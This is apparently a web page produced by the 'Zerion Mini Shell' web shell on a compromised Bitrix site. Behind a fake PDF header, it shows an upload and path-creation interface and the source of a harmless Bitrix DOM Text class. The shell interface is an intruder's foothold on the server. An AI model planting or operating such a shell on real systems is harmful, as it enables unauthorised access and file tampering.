%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/bitrix/www/bitrix/modules/main/lib/web/dom/
Upload File :
Create Path :
Current File : //proc/self/root/home/bitrix/www/bitrix/modules/main/lib/web/dom/text.php

<?php
namespace Bitrix\Main\Web\DOM;

class Text extends Node
{
	public function __construct($text)
	{
		$this->init();

		$this->nodeType = self::TEXT_NODE;
		$this->nodeValue = $text;
		$this->nodeName = '#text';
	}

	public function setNodeValue($text)
	{
		$this->nodeValue = $text;
	}
}

Zerion Mini Shell 1.0